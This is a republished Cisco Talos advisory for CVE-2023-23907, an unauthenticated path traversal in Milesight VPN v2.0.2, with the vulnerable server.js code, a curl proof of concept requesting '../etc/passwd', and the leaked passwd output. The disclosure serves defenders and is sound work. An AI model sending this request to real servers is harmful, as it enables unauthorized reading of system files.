Security
Headlines
HeadlinesLatestCVEs

Headline

CVE-2023-23907: TALOS-2023-1702 || Cisco Talos Intelligence Group

A directory traversal vulnerability exists in the server.js start functionality of Milesight VPN v2.0.2. A specially-crafted network request can lead to arbitrary file read. An attacker can send a network request to trigger this vulnerability.

CVE
#sql#vulnerability#web#ubuntu#cisco#redis#js#intel#auth#ssh#ssl

SUMMARY

A directory traversal vulnerability exists in the server.js start functionality of Milesight VPN v2.0.2. A specially-crafted network request can lead to arbitrary file read. An attacker can send a network request to trigger this vulnerability.

CONFIRMED VULNERABLE VERSIONS

The versions below were either tested or verified to be vulnerable by Talos or confirmed to be vulnerable by the vendor.

Milesight VPN v2.0.2

PRODUCT URLS

MilesightVPN - https://www.milesight-iot.com/milesightvpn/

CVSSv3 SCORE

7.5 - CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N

CWE

CWE-22 - Improper Limitation of a Pathname to a Restricted Directory (‘Path Traversal’)

DETAILS

The MilesightVPN is software that make the process easier of setting up the VPN tunnel for Milesight products, as well as allows monitoring the connection status with a web server interface.

The MilesightVPN’s server.js file has the start function that is the one responsible to manage the received requests:

function start(route,handle,connection,generateToken,verifyToken,lang){
    const options={
        key:fs.readFileSync(path.join(__dirname,'./https/server.key')),
        cert:fs.readFileSync(path.join(__dirname,'./https/server.crt'))
    };
    var defaultpage={
        page:'index.html',
        login:'login.html',
        port:'18080',
        ssl_port:'18443'
    };
    disconnect(connection);
   [...]
    https.createServer(options,function(req,res){
        var method=req.method;
        var pathname=url.parse(req.url).pathname;
        [...]
        var ext=path.parse(pathname).ext;
        ext=ext.slice(1);
        [...]
        var realPath=path.join(__dirname,'../'+pathname);
        var cookie=req.headers.cookie;
        if(cookie)
        {
            [...]
        }
        else
        {
            if(ext=='html'&&(pathname.indexOf('login.html')<0&&pathname.indexOf('Device_Auth')<0))
            {
                [...]
            }
        }

        if(method=='POST')
        {
            [...]
        }
        else
        {
            [...]
            if(ext=='html')
            {
                [...]
            }
            fs.readFile(realPath,function(err,data){                                                    [1]
                [...]
                var contentType='';
                switch(ext){
                    case 'html':
                        contentType='text/html';
                        break;
                    [...]
                    default:
                        contentType='text/plain';
                }
                res.writeHead(200,{'Content-Type':contentType});
                res.end(data);
            });
        }


    }).listen(defaultpage.ssl_port);
}

The function perform a series of check in the case the requested page extensions is html and in the case a cookie is provided. But, if the file does not have such extension and no cookie is provided, eventually, the code at [1] is reached and because no checks is performed against the provided path, this function is vulnerable to an unauthenticated directory path traversal.

Exploit Proof of Concept

Following a POC for the vulnerability exposed above:

$ curl --path-as-is --insecure https://<SERVER_ADDRESS>/../etc/passwd  

root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
bin:x:2:2:bin:/bin:/usr/sbin/nologin
sys:x:3:3:sys:/dev:/usr/sbin/nologin
sync:x:4:65534:sync:/bin:/bin/sync
games:x:5:60:games:/usr/games:/usr/sbin/nologin
man:x:6:12:man:/var/cache/man:/usr/sbin/nologin
lp:x:7:7:lp:/var/spool/lpd:/usr/sbin/nologin
mail:x:8:8:mail:/var/mail:/usr/sbin/nologin
news:x:9:9:news:/var/spool/news:/usr/sbin/nologin
uucp:x:10:10:uucp:/var/spool/uucp:/usr/sbin/nologin
proxy:x:13:13:proxy:/bin:/usr/sbin/nologin
www-data:x:33:33:www-data:/var/www:/usr/sbin/nologin
backup:x:34:34:backup:/var/backups:/usr/sbin/nologin
list:x:38:38:Mailing List Manager:/var/list:/usr/sbin/nologin
irc:x:39:39:ircd:/var/run/ircd:/usr/sbin/nologin
gnats:x:41:41:Gnats Bug-Reporting System (admin):/var/lib/gnats:/usr/sbin/nologin
nobody:x:65534:65534:nobody:/nonexistent:/usr/sbin/nologin
systemd-network:x:100:102:systemd Network Management,,,:/run/systemd:/usr/sbin/nologin
systemd-resolve:x:101:103:systemd Resolver,,,:/run/systemd:/usr/sbin/nologin
systemd-timesync:x:102:104:systemd Time Synchronization,,,:/run/systemd:/usr/sbin/nologin
messagebus:x:103:106::/nonexistent:/usr/sbin/nologin
syslog:x:104:110::/home/syslog:/usr/sbin/nologin
_apt:x:105:65534::/nonexistent:/usr/sbin/nologin
tss:x:106:111:TPM software stack,,,:/var/lib/tpm:/bin/false
uuidd:x:107:112::/run/uuidd:/usr/sbin/nologin
tcpdump:x:108:113::/nonexistent:/usr/sbin/nologin
sshd:x:109:65534::/run/sshd:/usr/sbin/nologin
landscape:x:110:115::/var/lib/landscape:/usr/sbin/nologin
pollinate:x:111:1::/var/cache/pollinate:/bin/false
vagrant:x:1000:1000:,,,:/home/vagrant:/bin/bash
systemd-coredump:x:999:999:systemd Core Dumper:/:/usr/sbin/nologin
ubuntu:x:1001:1001:Ubuntu:/home/ubuntu:/bin/bash
lxd:x:998:100::/var/snap/lxd/common/lxd:/bin/false
vboxadd:x:997:1::/var/run/vboxadd:/bin/false
fwupd-refresh:x:112:119:fwupd-refresh user,,,:/run/systemd:/usr/sbin/nologin
mysql:x:113:120:MySQL Server,,,:/nonexistent:/bin/false
redis:x:1002:1002::/home/redis:/bin/false
stund:x:1003:1003::/home/stund:/bin/false
tunnel:x:1004:1004::/bin:/bin/false

The request’s response is the /etc/passwd content.

VENDOR RESPONSE

Since the maintainer of this software did not release a patch during the 90 day window specified in our policy, we have now decided to release the information regarding this vulnerability, to make users of the software aware of this problem. See Cisco’s Coordinated Vulnerability Disclosure Policy for more information: https://tools.cisco.com/security/center/resources/vendor_vulnerability_policy.html

TIMELINE

2023-02-14 - Initial Vendor Contact
2023-02-21 - Vendor Disclosure
2023-07-06 - Public Release

Discovered by Francesco Benvenuto of Cisco Talos.

Related news

The many vulnerabilities Talos discovered in SOHO and industrial wireless routers post-VPNFilter

Given the privileged position these devices occupy on the networks they serve, they are prime targets for attackers, so their security posture is of paramount importance.

Taking over Milesight UR32L routers behind a VPN: 22 vulnerabilities and a full chain

In all, Cisco Talos is releasing 22 security advisories today, nine of which have a CVSS score greater than 8, associated with 69 CVEs.

CVE: Latest News

CVE-2023-50976: Transactions API Authorization by oleiman · Pull Request #14969 · redpanda-data/redpanda
CVE-2023-6905
CVE-2023-6903
CVE-2023-6904
CVE-2023-3907